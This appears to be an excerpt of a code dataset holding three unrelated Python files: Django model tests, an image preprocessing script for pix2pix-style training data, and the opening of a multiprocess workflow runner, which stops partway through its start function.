source
stringlengths
3
86
python
stringlengths
75
1.04M
tests.py
import threading from datetime import datetime, timedelta from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections from django.db.models.manager import BaseManager from django.db.models.query import EmptyQuerySet, QuerySet from django.test import ( SimpleTestCase, TestCase, TransactionTestCase, skipUnlessDBFeature, ) from django.utils.translation import gettext_lazy from .models import Article, ArticleSelectOnSave, FeaturedArticle, SelfRef class ModelInstanceCreationTests(TestCase): def test_object_is_not_written_to_database_until_save_was_called(self): a = Article( id=None, headline='Parrot programs in Python', pub_date=datetime(2005, 7, 28), ) self.assertIsNone(a.id) self.assertEqual(Article.objects.all().count(), 0) # Save it into the database. You have to call save() explicitly. a.save() self.assertIsNotNone(a.id) self.assertEqual(Article.objects.all().count(), 1) def test_can_initialize_model_instance_using_positional_arguments(self): """ You can initialize a model instance using positional arguments, which should match the field order as defined in the model. 
""" a = Article(None, 'Second article', datetime(2005, 7, 29)) a.save() self.assertEqual(a.headline, 'Second article') self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0)) def test_can_create_instance_using_kwargs(self): a = Article( id=None, headline='Third article', pub_date=datetime(2005, 7, 30), ) a.save() self.assertEqual(a.headline, 'Third article') self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0)) def test_autofields_generate_different_values_for_each_instance(self): a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0)) a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0)) a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0)) self.assertNotEqual(a3.id, a1.id) self.assertNotEqual(a3.id, a2.id) def test_can_mix_and_match_position_and_kwargs(self): # You can also mix and match position and keyword arguments, but # be sure not to duplicate field information. a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31)) a.save() self.assertEqual(a.headline, 'Fourth article') def test_cannot_create_instance_with_invalid_kwargs(self): with self.assertRaisesMessage(TypeError, "'foo' is an invalid keyword argument for this function"): Article( id=None, headline='Some headline', pub_date=datetime(2005, 7, 31), foo='bar', ) def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self): """ You can leave off the value for an AutoField when creating an object, because it'll get filled in automatically when you save(). 
""" a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31)) a.save() self.assertEqual(a.headline, 'Article 5') self.assertIsNotNone(a.id) def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self): a = Article(pub_date=datetime(2005, 7, 31)) a.save() self.assertEqual(a.headline, 'Default headline') def test_for_datetimefields_saves_as_much_precision_as_was_given(self): """as much precision in *seconds*""" a1 = Article( headline='Article 7', pub_date=datetime(2005, 7, 31, 12, 30), ) a1.save() self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date, datetime(2005, 7, 31, 12, 30)) a2 = Article( headline='Article 8', pub_date=datetime(2005, 7, 31, 12, 30, 45), ) a2.save() self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date, datetime(2005, 7, 31, 12, 30, 45)) def test_saving_an_object_again_does_not_create_a_new_object(self): a = Article(headline='original', pub_date=datetime(2014, 5, 16)) a.save() current_id = a.id a.save() self.assertEqual(a.id, current_id) a.headline = 'Updated headline' a.save() self.assertEqual(a.id, current_id) def test_querysets_checking_for_membership(self): headlines = [ 'Parrot programs in Python', 'Second article', 'Third article'] some_pub_date = datetime(2014, 5, 16, 12, 1) for headline in headlines: Article(headline=headline, pub_date=some_pub_date).save() a = Article(headline='Some headline', pub_date=some_pub_date) a.save() # You can use 'in' to test for membership... self.assertIn(a, Article.objects.all()) # ... 
but there will often be more efficient ways if that is all you need: self.assertTrue(Article.objects.filter(id=a.id).exists()) class ModelTest(TestCase): def test_objects_attribute_is_only_available_on_the_class_itself(self): with self.assertRaisesMessage(AttributeError, "Manager isn't accessible via Article instances"): getattr(Article(), "objects",) self.assertFalse(hasattr(Article(), 'objects')) self.assertTrue(hasattr(Article, 'objects')) def test_queryset_delete_removes_all_items_in_that_queryset(self): headlines = [ 'An article', 'Article One', 'Amazing article', 'Boring article'] some_pub_date = datetime(2014, 5, 16, 12, 1) for headline in headlines: Article(headline=headline, pub_date=some_pub_date).save() self.assertQuerysetEqual( Article.objects.all().order_by('headline'), ["<Article: Amazing article>", "<Article: An article>", "<Article: Article One>", "<Article: Boring article>"] ) Article.objects.filter(headline__startswith='A').delete() self.assertQuerysetEqual(Article.objects.all().order_by('headline'), ["<Article: Boring article>"]) def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self): some_pub_date = datetime(2014, 5, 16, 12, 1) a1 = Article.objects.create(headline='First', pub_date=some_pub_date) a2 = Article.objects.create(headline='Second', pub_date=some_pub_date) self.assertNotEqual(a1, a2) self.assertEqual(a1, Article.objects.get(id__exact=a1.id)) self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id)) def test_microsecond_precision(self): a9 = Article( headline='Article 9', pub_date=datetime(2005, 7, 31, 12, 30, 45, 180), ) a9.save() self.assertEqual(Article.objects.get(pk=a9.pk).pub_date, datetime(2005, 7, 31, 12, 30, 45, 180)) def test_manually_specify_primary_key(self): # You can manually specify the primary key when creating a new object. 
a101 = Article( id=101, headline='Article 101', pub_date=datetime(2005, 7, 31, 12, 30, 45), ) a101.save() a101 = Article.objects.get(pk=101) self.assertEqual(a101.headline, 'Article 101') def test_create_method(self): # You can create saved objects in a single step a10 = Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) self.assertEqual(Article.objects.get(headline="Article 10"), a10) def test_year_lookup_edge_case(self): # Edge-case test: A year lookup should retrieve all objects in # the given year, including Jan. 1 and Dec. 31. Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2008), ["<Article: Article 11>", "<Article: Article 12>"] ) def test_unicode_data(self): # Unicode data works, too. a = Article( headline='\u6797\u539f \u3081\u3050\u307f', pub_date=datetime(2005, 7, 28), ) a.save() self.assertEqual(Article.objects.get(pk=a.id).headline, '\u6797\u539f \u3081\u3050\u307f') def test_hash_function(self): # Model instances have a hash function, so they can be used in sets # or as dictionary keys. Two models compare as equal if their primary # keys are equal. a10 = Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) a11 = Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) a12 = Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) s = {a10, a11, a12} self.assertIn(Article.objects.get(headline='Article 11'), s) def test_extra_method_select_argument_with_dashes_and_values(self): # The 'select' argument to extra() supports names with dashes in # them, as long as you use values(). 
Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) dicts = Article.objects.filter( pub_date__year=2008).extra( select={'dashed-value': '1'}).values('headline', 'dashed-value') self.assertEqual( [sorted(d.items()) for d in dicts], [[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]] ) def test_extra_method_select_argument_with_dashes(self): # If you use 'select' with extra() and names containing dashes on a # query that's *not* a values() query, those extra 'select' values # will silently be ignored. Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) articles = Article.objects.filter( pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'}) self.assertEqual(articles[0].undashedvalue, 2) def test_create_relation_with_gettext_lazy(self): """ gettext_lazy objects work when saving model instances through various methods. Refs #10498. 
""" notlazy = 'test' lazy = gettext_lazy(notlazy) Article.objects.create(headline=lazy, pub_date=datetime.now()) article = Article.objects.get() self.assertEqual(article.headline, notlazy) # test that assign + save works with Promise objects article.headline = lazy article.save() self.assertEqual(article.headline, notlazy) # test .update() Article.objects.update(headline=lazy) article = Article.objects.get() self.assertEqual(article.headline, notlazy) # still test bulk_create() Article.objects.all().delete() Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())]) article = Article.objects.get() self.assertEqual(article.headline, notlazy) def test_emptyqs(self): msg = "EmptyQuerySet can't be instantiated" with self.assertRaisesMessage(TypeError, msg): EmptyQuerySet() self.assertIsInstance(Article.objects.none(), EmptyQuerySet) self.assertNotIsInstance('', EmptyQuerySet) def test_emptyqs_values(self): # test for #15959 Article.objects.create(headline='foo', pub_date=datetime.now()) with self.assertNumQueries(0): qs = Article.objects.none().values_list('pk') self.assertIsInstance(qs, EmptyQuerySet) self.assertEqual(len(qs), 0) def test_emptyqs_customqs(self): # A hacky test for custom QuerySet subclass - refs #17271 Article.objects.create(headline='foo', pub_date=datetime.now()) class CustomQuerySet(QuerySet): def do_something(self): return 'did something' qs = Article.objects.all() qs.__class__ = CustomQuerySet qs = qs.none() with self.assertNumQueries(0): self.assertEqual(len(qs), 0) self.assertIsInstance(qs, EmptyQuerySet) self.assertEqual(qs.do_something(), 'did something') def test_emptyqs_values_order(self): # Tests for ticket #17712 Article.objects.create(headline='foo', pub_date=datetime.now()) with self.assertNumQueries(0): self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0) with self.assertNumQueries(0): self.assertEqual(len(Article.objects.none().filter( id__in=Article.objects.values_list('id', 
flat=True))), 0) @skipUnlessDBFeature('can_distinct_on_fields') def test_emptyqs_distinct(self): # Tests for #19426 Article.objects.create(headline='foo', pub_date=datetime.now()) with self.assertNumQueries(0): self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0) def test_ticket_20278(self): sr = SelfRef.objects.create() with self.assertRaises(ObjectDoesNotExist): SelfRef.objects.get(selfref=sr) def test_eq(self): self.assertEqual(Article(id=1), Article(id=1)) self.assertNotEqual(Article(id=1), object()) self.assertNotEqual(object(), Article(id=1)) a = Article() self.assertEqual(a, a) self.assertNotEqual(Article(), a) def test_hash(self): # Value based on PK self.assertEqual(hash(Article(id=1)), hash(1)) msg = 'Model instances without primary key value are unhashable' with self.assertRaisesMessage(TypeError, msg): # No PK value -> unhashable (because save() would then change # hash) hash(Article()) def test_delete_and_access_field(self): # Accessing a field after it's deleted from a model reloads its value. pub_date = datetime.now() article = Article.objects.create(headline='foo', pub_date=pub_date) new_pub_date = article.pub_date + timedelta(days=10) article.headline = 'bar' article.pub_date = new_pub_date del article.headline with self.assertNumQueries(1): self.assertEqual(article.headline, 'foo') # Fields that weren't deleted aren't reloaded. self.assertEqual(article.pub_date, new_pub_date) class ModelLookupTest(TestCase): def setUp(self): # Create an Article. self.a = Article( id=None, headline='Swallow programs in Python', pub_date=datetime(2005, 7, 28), ) # Save it into the database. You have to call save() explicitly. self.a.save() def test_all_lookup(self): # Change values by changing the attributes, then calling save(). self.a.headline = 'Parrot programs in Python' self.a.save() # Article.objects.all() returns all the articles in the database. 
self.assertQuerysetEqual(Article.objects.all(), ['<Article: Parrot programs in Python>']) def test_rich_lookup(self): # Django provides a rich database lookup API. self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a) self.assertEqual(Article.objects.get(headline__startswith='Swallow'), self.a) self.assertEqual(Article.objects.get(pub_date__year=2005), self.a) self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a) self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a) self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a) def test_equal_lookup(self): # The "__exact" lookup type can be omitted, as a shortcut. self.assertEqual(Article.objects.get(id=self.a.id), self.a) self.assertEqual(Article.objects.get(headline='Swallow programs in Python'), self.a) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2005), ['<Article: Swallow programs in Python>'], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2004), [], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2005, pub_date__month=7), ['<Article: Swallow programs in Python>'], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__week_day=5), ['<Article: Swallow programs in Python>'], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__week_day=6), [], ) def test_does_not_exist(self): # Django raises an Article.DoesNotExist exception for get() if the # parameters don't match any object. with self.assertRaisesMessage(ObjectDoesNotExist, "Article matching query does not exist."): Article.objects.get(id__exact=2000,) # To avoid dict-ordering related errors check only one lookup # in single assert. 
with self.assertRaises(ObjectDoesNotExist): Article.objects.get(pub_date__year=2005, pub_date__month=8) with self.assertRaisesMessage(ObjectDoesNotExist, "Article matching query does not exist."): Article.objects.get(pub_date__week_day=6,) def test_lookup_by_primary_key(self): # Lookup by a primary key is the most common case, so Django # provides a shortcut for primary-key exact lookups. # The following is identical to articles.get(id=a.id). self.assertEqual(Article.objects.get(pk=self.a.id), self.a) # pk can be used as a shortcut for the primary key name in any query. self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]), ["<Article: Swallow programs in Python>"]) # Model instances of the same type and same ID are considered equal. a = Article.objects.get(pk=self.a.id) b = Article.objects.get(pk=self.a.id) self.assertEqual(a, b) def test_too_many(self): # Create a very similar object a = Article( id=None, headline='Swallow bites Python', pub_date=datetime(2005, 7, 28), ) a.save() self.assertEqual(Article.objects.count(), 2) # Django raises an Article.MultipleObjectsReturned exception if the # lookup matches more than one object msg = "get() returned more than one Article -- it returned 2!" with self.assertRaisesMessage(MultipleObjectsReturned, msg): Article.objects.get(headline__startswith='Swallow',) with self.assertRaisesMessage(MultipleObjectsReturned, msg): Article.objects.get(pub_date__year=2005,) with self.assertRaisesMessage(MultipleObjectsReturned, msg): Article.objects.get(pub_date__year=2005, pub_date__month=7) class ConcurrentSaveTests(TransactionTestCase): available_apps = ['basic'] @skipUnlessDBFeature('test_db_allows_multiple_connections') def test_concurrent_delete_with_save(self): """ Test fetching, deleting and finally saving an object - we should get an insert in this case. 
""" a = Article.objects.create(headline='foo', pub_date=datetime.now()) exceptions = [] def deleter(): try: # Do not delete a directly - doing so alters its state. Article.objects.filter(pk=a.pk).delete() except Exception as e: exceptions.append(e) finally: connections[DEFAULT_DB_ALIAS].close() self.assertEqual(len(exceptions), 0) t = threading.Thread(target=deleter) t.start() t.join() a.save() self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo') class ManagerTest(SimpleTestCase): QUERYSET_PROXY_METHODS = [ 'none', 'count', 'dates', 'datetimes', 'distinct', 'extra', 'get', 'get_or_create', 'update_or_create', 'create', 'bulk_create', 'filter', 'aggregate', 'annotate', 'complex_filter', 'exclude', 'in_bulk', 'iterator', 'earliest', 'latest', 'first', 'last', 'order_by', 'select_for_update', 'select_related', 'prefetch_related', 'values', 'values_list', 'update', 'reverse', 'defer', 'only', 'using', 'exists', '_insert', '_update', 'raw', 'union', 'intersection', 'difference', ] def test_manager_methods(self): """ This test ensures that the correct set of methods from `QuerySet` are copied onto `Manager`. It's particularly useful to prevent accidentally leaking new methods into `Manager`. New `QuerySet` methods that should also be copied onto `Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`. 
""" self.assertEqual( sorted(BaseManager._get_queryset_methods(QuerySet)), sorted(self.QUERYSET_PROXY_METHODS), ) class SelectOnSaveTests(TestCase): def test_select_on_save(self): a1 = Article.objects.create(pub_date=datetime.now()) with self.assertNumQueries(1): a1.save() asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now()) with self.assertNumQueries(2): asos.save() with self.assertNumQueries(1): asos.save(force_update=True) Article.objects.all().delete() with self.assertRaisesMessage(DatabaseError, 'Forced update did not affect any rows.'): with self.assertNumQueries(1): asos.save(force_update=True) def test_select_on_save_lying_update(self): """ select_on_save works correctly if the database doesn't return correct information about matched rows from UPDATE. """ # Change the manager to not return "row matched" for update(). # We are going to change the Article's _base_manager class # dynamically. This is a bit of a hack, but it seems hard to # test this properly otherwise. Article's manager, because # proxy models use their parent model's _base_manager. orig_class = Article._base_manager._queryset_class class FakeQuerySet(QuerySet): # Make sure the _update method below is in fact called. called = False def _update(self, *args, **kwargs): FakeQuerySet.called = True super()._update(*args, **kwargs) return 0 try: Article._base_manager._queryset_class = FakeQuerySet asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now()) with self.assertNumQueries(3): asos.save() self.assertTrue(FakeQuerySet.called) # This is not wanted behavior, but this is how Django has always # behaved for databases that do not return correct information # about matched rows for UPDATE. with self.assertRaisesMessage(DatabaseError, 'Forced update did not affect any rows.'): asos.save(force_update=True) msg = ( "An error occurred in the current transaction. You can't " "execute queries until the end of the 'atomic' block." 
) with self.assertRaisesMessage(DatabaseError, msg): asos.save(update_fields=['pub_date']) finally: Article._base_manager._queryset_class = orig_class class ModelRefreshTests(TestCase): def test_refresh(self): a = Article.objects.create(pub_date=datetime.now()) Article.objects.create(pub_date=datetime.now()) Article.objects.filter(pk=a.pk).update(headline='new headline') with self.assertNumQueries(1): a.refresh_from_db() self.assertEqual(a.headline, 'new headline') orig_pub_date = a.pub_date new_pub_date = a.pub_date + timedelta(10) Article.objects.update(headline='new headline 2', pub_date=new_pub_date) with self.assertNumQueries(1): a.refresh_from_db(fields=['headline']) self.assertEqual(a.headline, 'new headline 2') self.assertEqual(a.pub_date, orig_pub_date) with self.assertNumQueries(1): a.refresh_from_db() self.assertEqual(a.pub_date, new_pub_date) def test_unknown_kwarg(self): s = SelfRef.objects.create() msg = "refresh_from_db() got an unexpected keyword argument 'unknown_kwarg'" with self.assertRaisesMessage(TypeError, msg): s.refresh_from_db(unknown_kwarg=10) def test_refresh_fk(self): s1 = SelfRef.objects.create() s2 = SelfRef.objects.create() s3 = SelfRef.objects.create(selfref=s1) s3_copy = SelfRef.objects.get(pk=s3.pk) s3_copy.selfref.touched = True s3.selfref = s2 s3.save() with self.assertNumQueries(1): s3_copy.refresh_from_db() with self.assertNumQueries(1): # The old related instance was thrown away (the selfref_id has # changed). It needs to be reloaded on access, so one query # executed. 
self.assertFalse(hasattr(s3_copy.selfref, 'touched')) self.assertEqual(s3_copy.selfref, s2) def test_refresh_null_fk(self): s1 = SelfRef.objects.create() s2 = SelfRef.objects.create(selfref=s1) s2.selfref = None s2.refresh_from_db() self.assertEqual(s2.selfref, s1) def test_refresh_unsaved(self): pub_date = datetime.now() a = Article.objects.create(pub_date=pub_date) a2 = Article(id=a.pk) with self.assertNumQueries(1): a2.refresh_from_db() self.assertEqual(a2.pub_date, pub_date) self.assertEqual(a2._state.db, "default") def test_refresh_fk_on_delete_set_null(self): a = Article.objects.create( headline='Parrot programs in Python', pub_date=datetime(2005, 7, 28), ) s1 = SelfRef.objects.create(article=a) a.delete() s1.refresh_from_db() self.assertIsNone(s1.article_id) self.assertIsNone(s1.article) def test_refresh_no_fields(self): a = Article.objects.create(pub_date=datetime.now()) with self.assertNumQueries(0): a.refresh_from_db(fields=[]) def test_refresh_clears_reverse_related(self): """refresh_from_db() clear cached reverse relations.""" article = Article.objects.create( headline='Parrot programs in Python', pub_date=datetime(2005, 7, 28), ) self.assertFalse(hasattr(article, 'featured')) FeaturedArticle.objects.create(article_id=article.pk) article.refresh_from_db() self.assertTrue(hasattr(article, 'featured')) def test_refresh_clears_one_to_one_field(self): article = Article.objects.create( headline='Parrot programs in Python', pub_date=datetime(2005, 7, 28), ) featured = FeaturedArticle.objects.create(article_id=article.pk) self.assertEqual(featured.article.headline, 'Parrot programs in Python') article.headline = 'Parrot programs in Python 2.0' article.save() featured.refresh_from_db() self.assertEqual(featured.article.headline, 'Parrot programs in Python 2.0')
process.py
from __future__ import absolute_import from __future__ import division from __future__ import print_function import argparse import os import tempfile import subprocess import tensorflow as tf import numpy as np import tfimage as im import threading import time import multiprocessing edge_pool = None parser = argparse.ArgumentParser() parser.add_argument("--input_dir", required=True, help="path to folder containing images") parser.add_argument("--output_dir", required=True, help="output path") parser.add_argument("--operation", required=True, choices=["grayscale", "resize", "blank", "combine", "edges"]) parser.add_argument("--workers", type=int, default=1, help="number of workers") # resize parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation") parser.add_argument("--size", type=int, default=1024, help="size to use for resize operation") # combine parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation") a = parser.parse_args() def resize(src): height, width, _ = src.shape dst = src if height != width: if a.pad: size = max(height, width) # pad to correct ratio oh = (size - height) // 2 ow = (size - width) // 2 dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size) else: # crop to correct ratio size = min(height, width) oh = (height - size) // 2 ow = (width - size) // 2 dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size) assert(dst.shape[0] == dst.shape[1]) size, _, _ = dst.shape if size > a.size: dst = im.downscale(images=dst, size=[a.size, a.size]) elif size < a.size: dst = im.upscale(images=dst, size=[a.size, a.size]) return dst def blank(src): height, width, _ = src.shape if height != width: raise Exception("non-square image") image_size = width size = int(image_size * 0.3) offset = int(image_size / 2 - size / 2) dst = src dst[offset:offset + size,offset:offset + size,:] = 
np.ones([size, size, 3]) return dst def combine(src, src_path): if a.b_dir is None: raise Exception("missing b_dir") # find corresponding file in b_dir, could have a different extension basename, _ = os.path.splitext(os.path.basename(src_path)) for ext in [".png", ".jpg"]: sibling_path = os.path.join(a.b_dir, basename + ext) if os.path.exists(sibling_path): sibling = im.load(sibling_path) break else: raise Exception("could not find sibling image for " + src_path) # make sure that dimensions are correct height, width, _ = src.shape if height != sibling.shape[0] or width != sibling.shape[1]: raise Exception("differing sizes") # convert both images to RGB if necessary if src.shape[2] == 1: src = im.grayscale_to_rgb(images=src) if sibling.shape[2] == 1: sibling = im.grayscale_to_rgb(images=sibling) # remove alpha channel if src.shape[2] == 4: src = src[:,:,:3] if sibling.shape[2] == 4: sibling = sibling[:,:,:3] return np.concatenate([src, sibling], axis=1) def grayscale(src): return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src)) net = None def run_caffe(src): # lazy load caffe and create net global net if net is None: # don't require caffe unless we are doing edge detection os.environ["GLOG_minloglevel"] = "2" # disable logging from caffe import caffe # using this requires using the docker image or assembling a bunch of dependencies # and then changing these hardcoded paths net = caffe.Net("/opt/caffe/examples/hed/deploy.prototxt", "/opt/caffe/hed_pretrained_bsds.caffemodel", caffe.TEST) net.blobs["data"].reshape(1, *src.shape) net.blobs["data"].data[...] 
= src net.forward() return net.blobs["sigmoid-fuse"].data[0][0,:,:] def edges(src): # based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py # and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m import scipy.io src = src * 255 border = 128 # put a padding around images since edge detection seems to detect edge of image src = src[:,:,:3] # remove alpha channel if present src = np.pad(src, ((border, border), (border, border), (0,0)), "reflect") src = src[:,:,::-1] src -= np.array((104.00698793,116.66876762,122.67891434)) src = src.transpose((2, 0, 1)) # [height, width, channels] => [batch, channel, height, width] fuse = edge_pool.apply(run_caffe, [src]) fuse = fuse[border:-border, border:-border] with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file: scipy.io.savemat(mat_file.name, {"input": fuse}) octave_code = r""" E = 1-load(input_path).input; E = imresize(E, [image_width,image_width]); E = 1 - E; E = single(E); [Ox, Oy] = gradient(convTri(E, 4), 1); [Oxx, ~] = gradient(Ox, 1); [Oxy, Oyy] = gradient(Oy, 1); O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi); E = edgesNmsMex(E, O, 1, 5, 1.01, 1); E = double(E >= max(eps, threshold)); E = bwmorph(E, 'thin', inf); E = bwareaopen(E, small_edge); E = 1 - E; E = uint8(E * 255); imwrite(E, output_path); """ config = dict( input_path="'%s'" % mat_file.name, output_path="'%s'" % png_file.name, image_width=1024, threshold=25.0/255.0, small_edge=5, ) args = ["octave"] for k, v in config.items(): args.extend(["--eval", "%s=%s;" % (k, v)]) args.extend(["--eval", octave_code]) try: subprocess.check_output(args, stderr=subprocess.STDOUT) except subprocess.CalledProcessError as e: print("octave failed") print("returncode:", e.returncode) print("output:", e.output) raise return im.load(png_file.name) def process(src_path, dst_path): src = im.load(src_path) if a.operation == "grayscale": dst = grayscale(src) 
elif a.operation == "resize": dst = resize(src) elif a.operation == "blank": dst = blank(src) elif a.operation == "combine": dst = combine(src, src_path) elif a.operation == "edges": dst = edges(src) else: raise Exception("invalid operation") im.save(dst, dst_path) complete_lock = threading.Lock() start = None num_complete = 0 total = 0 def complete(): global num_complete, rate, last_complete with complete_lock: num_complete += 1 now = time.time() elapsed = now - start rate = num_complete / elapsed if rate > 0: remaining = (total - num_complete) / rate else: remaining = 0 print("%d/%d complete %0.2f images/sec %dm%ds elapsed %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60)) last_complete = now def main(): if not os.path.exists(a.output_dir): os.makedirs(a.output_dir) src_paths = [] dst_paths = [] skipped = 0 for src_path in im.find(a.input_dir): name, _ = os.path.splitext(os.path.basename(src_path)) dst_path = os.path.join(a.output_dir, name + ".png") if os.path.exists(dst_path): skipped += 1 else: src_paths.append(src_path) dst_paths.append(dst_path) print("skipping %d files that already exist" % skipped) global total total = len(src_paths) print("processing %d files" % total) global start start = time.time() if a.operation == "edges": # use a multiprocessing pool for this operation so it can use multiple CPUs # create the pool before we launch processing threads global edge_pool edge_pool = multiprocessing.Pool(a.workers) if a.workers == 1: with tf.Session() as sess: for src_path, dst_path in zip(src_paths, dst_paths): process(src_path, dst_path) complete() else: queue = tf.train.input_producer(zip(src_paths, dst_paths), shuffle=False, num_epochs=1) dequeue_op = queue.dequeue() def worker(coord): with sess.as_default(): while not coord.should_stop(): try: src_path, dst_path = sess.run(dequeue_op) except tf.errors.OutOfRangeError: coord.request_stop() break process(src_path, dst_path) complete() # init 
epoch counter for the queue local_init_op = tf.local_variables_initializer() with tf.Session() as sess: sess.run(local_init_op) coord = tf.train.Coordinator() threads = tf.train.start_queue_runners(coord=coord) for i in range(a.workers): t = threading.Thread(target=worker, args=(coord,)) t.start() threads.append(t) try: coord.join(threads) except KeyboardInterrupt: coord.request_stop() coord.join(threads) main()
__init__.py
import sys
from multiprocessing import Manager, Process
import yaml
import json
from jsonschema import validate
import os.path
import logging
from tempfile import mkstemp, mkdtemp
import os
import shutil
from .dependentqueue import DependentQueue
from .task import enqueue, EndOfQueue, either_data
from .process import work_on
from .io import read_from_disk, merge_files
from .python import python_to_spec
from .spec import dict_to_spec
from .objectstore import PlasmaStore, SimpleStore
from tx.readable_log import getLogger

logger = getLogger(__name__, logging.INFO)

# JSON schema used to validate workflow specs before execution.
with open(os.path.join(os.path.dirname(__file__), "schema.json")) as f:
    schema = json.load(f)


def run_python(number_of_workers, pyf, dataf, system_paths=[], validate_spec=True, output_path=None, level=0, object_store=None):
    """Run a workflow defined by a Python source file.

    :param number_of_workers: number of worker processes to spawn
    :param pyf: path to the Python file defining the workflow
    :param dataf: path to a YAML file with the input data
    :param system_paths: extra sys.path entries needed to import the workflow
    :param validate_spec: whether to validate the generated spec against the schema
    :param output_path: file to write results to; if None, results are returned
    :param level: nesting level passed through to the task enqueuer
    :param object_store: pre-initialized object store, or None to create one
    :return: the workflow result if output_path is None, otherwise None
    """
    with open(pyf) as s:
        py = s.read()
    with open(dataf) as d:
        data = yaml.safe_load(d)
    return start_python(number_of_workers, py, data, system_paths, validate_spec, output_path, level, object_store)


def run(number_of_workers, specf, dataf, system_paths=[], validate_spec=True, output_path=None, level=0, object_store=None):
    """Run a workflow defined by a YAML spec file. Parameters mirror run_python,
    except specf is a YAML workflow spec instead of Python source."""
    with open(specf) as s:
        spec = yaml.safe_load(s)
    with open(dataf) as d:
        data = yaml.safe_load(d)
    return start(number_of_workers, spec, data, system_paths, validate_spec, output_path, level, object_store)


def start_python(number_of_workers, py, data, system_paths, validate_spec, output_path, level, object_store):
    """Convert Python workflow source to a spec, then run it via start().

    system_paths entries not already on sys.path are appended only for the
    duration of the conversion and removed afterwards.
    """
    add_paths = list(set(system_paths) - set(sys.path))
    sys.path.extend(add_paths)
    logger.debug(f"add_paths = {add_paths}")
    try:
        spec = python_to_spec(py)
    finally:
        # Remove exactly the paths we appended (they were added at the end).
        for _ in range(len(add_paths)):
            sys.path.pop()
    return start(number_of_workers, spec, data, system_paths, validate_spec, output_path, level, object_store)


DEFAULT_PLASMA_STORE_SIZE = 50000000


def start(number_of_workers, spec, data, system_paths, validate_spec, output_path, level, object_store):
    """Execute a workflow spec with a pool of worker processes.

    Each worker writes its results to a temp file; the per-worker files are
    merged when all workers finish. If output_path is None the merged result
    is read back and returned, otherwise it is written to output_path and
    None is returned.

    :raises jsonschema.ValidationError: if validate_spec is True and the spec
        does not conform to the schema
    """
    if validate_spec:
        validate(instance=spec, schema=schema)
    if output_path is None:
        temp_dir = mkdtemp()
    else:
        # Truncate/create the output file up front so failures surface early,
        # and keep the temp dir on the same filesystem as the output.
        with open(output_path, "w"):
            pass
        output_dir = os.path.dirname(output_path)
        temp_dir = mkdtemp(dir=output_dir)
    shutdown_object_store = False
    temp_path = None
    try:
        with Manager() as manager:
            if object_store is None:
                try:
                    logger.info("using PlasmaStore")
                    object_store = PlasmaStore(manager, DEFAULT_PLASMA_STORE_SIZE)
                except Exception:
                    # Fix: was a bare `except:`, which also swallowed
                    # KeyboardInterrupt/SystemExit. Fall back to the simple
                    # in-manager store only on ordinary errors, and log why.
                    logger.info("using SimpleStore")
                    object_store = SimpleStore(manager)
                object_store.init()
